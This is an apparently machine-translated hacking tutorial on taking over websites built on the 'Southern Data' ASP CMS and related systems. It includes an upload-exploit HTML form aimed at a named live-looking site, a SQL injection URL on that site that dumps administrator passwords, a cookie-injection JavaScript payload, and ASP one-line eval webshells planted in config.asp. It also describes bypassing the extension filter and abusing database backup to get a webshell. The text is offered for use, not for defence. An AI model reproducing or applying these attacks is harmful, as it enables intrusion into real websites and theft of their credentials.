Summary of Southern data using shell

Use the upfile_other.asp vulnerability file to directly obtain the SHELL

You can directly open userreg. asp to register a member and log on to the user. The upload code is as follows:

<HTML> <HEAD>
<META http-equiv = Content-Type content = "text/html; charset = gb2312">
<STYLE type = text/css> BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: # e1f4ee
}
. Tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: # 0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>

<META content = "MSHTML 6.00.2800.1400" name = GENERATOR> </HEAD>
<BODY leftMargin = 0 topMargin = 0>
<FORM name = form1 action = "http://www.huobaodidai.cn/upfile_Other.asp"; method = post
EncType = multipart/form-data> <INPUT class = tx1 type = file size = 30 name = FileName> <INPUT class = tx1 type = file size = 30 name = FileName1> <INPUT style = "BORDER-RIGHT: rgb (88,88, 88) 1px double; BORDER-TOP: rgb (88,88, 88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb (88,88, 88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb (88,88, 88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal "type = submit value = upload name = Submit>
<INPUT id = PhotoUrlID type = hidden value = 0 name = PhotoUrlID> </FORM> </BODY> </HTML>

Save the above Code as html format, replace the URL in the code, select the image file in the first box, and select the second box. cer ,. asa or asp file upload (a space is required to be followed. It seems that a space cannot be followed for use in IE8. When a space is added, the Select File Dialog Box is displayed. I cannot find a solution ).

Note: This method can be used to kill Southern data, excellent systems, and the Internet.

2The password of the second kill Administrator account is injected as follows:

Http://www.huobaodidai.cn/NewsType.asp? SmallClass = % 20 union % 20 select % 200, username % 2 BCHR (124) % 2 Bpassword, 2, 3, 4, 5, 6, 7, 8, 9% 20 from % 20 admin % 20 union % 20 select % 20 * % 20 from % 20 news % 20 where % 201 = 2% 20and % 20 =

The above Code directly exposes the Administrator account and password. The SHELL method is as follows:

Write "%> <% eval (request (chr (35) %> <%

Shell written to http://www.target.com/inc/config.asp successfully

Here, the chr (32) password is "#".

3Cookie Injection

Clear the address bar, use the union statement for injection, and submit:

Javascript: Alert (document. cookie = "id =" + escape ("1 and 1 = 2 union select 1, username, password, 4, 5, 6, 7, 8, 9, 10 from Admin "))

If you are a cow, you can do it manually. I don't know it anyway. Why not use the cookie injection Conversion Tool of the hedgehog to help you quickly?

Note: It seems that there are also COOKIE injection in systems such as southern data, liangjing system, and netsoft world.

(Of course, the southern region does not only have the above three vulnerabilities, but also has several vulnerabilities that seem to be not commonly used. I will summarize the common vulnerabilities for you to help you)

Iii. Summary of the SHELL method in the background

(1) Insert a sentence to the website configuration in System Management: after entering the background, click "System Management" on the left, and then click "website configuration" on the right side of "website name" (or elsewhere) add "%> <% Eval (Request (chr (112) %> <%, and then click Save configuration,

Then open the inc/config. asp file and we can see that a sentence has been written to the configuration file,

Then open the client of a Trojan and submit it to get a pony.

(Note: The following figures are all tested on other websites. To prevent information leakage and not intercept the website connection, please forgive me !)

(2) Background Upload Vulnerability. Some code snippets in the Upfile_Photo.asp file are as follows:

If fileEXT = "asp" or fileEXT = "asa" or fileEXT = "aspx" then
EnableUpload = false
End if
If EnableUpload = false then
Msg = "this file type cannot be uploaded! Only the following file types can be uploaded: "& UpFileType
FoundErr = true
End if

You can see that the program only restricts the upload of files in the "asp", "asa", "aspx" class, we only need to add files that can be parsed by the server, such as "cer", to the allowed Upload File Types in "website configuration,


The download page is displayed when you submit the file. When you upload other files with suffixes such as "htr, cdx", the server does not request the file when you submit the file (you can only say that you are lucky)

(3) Back-end backup: Upload the asp horse with the jpg suffix to the product under "Product Management" and back up the database under "System Management, fill in the upload path in the "current database path" column, and enter the name of the backup horse in the "backup database name", but the system will automatically add it after the name. asa's

Click "OK" and prompt "Database Backup succeeded ...." However, the actual file does not contain. asa.

Directly access the backup address to obtain a webshell.

(Despite the background demonstration using netsoft, the shells used in both the southern and excellent background are similar)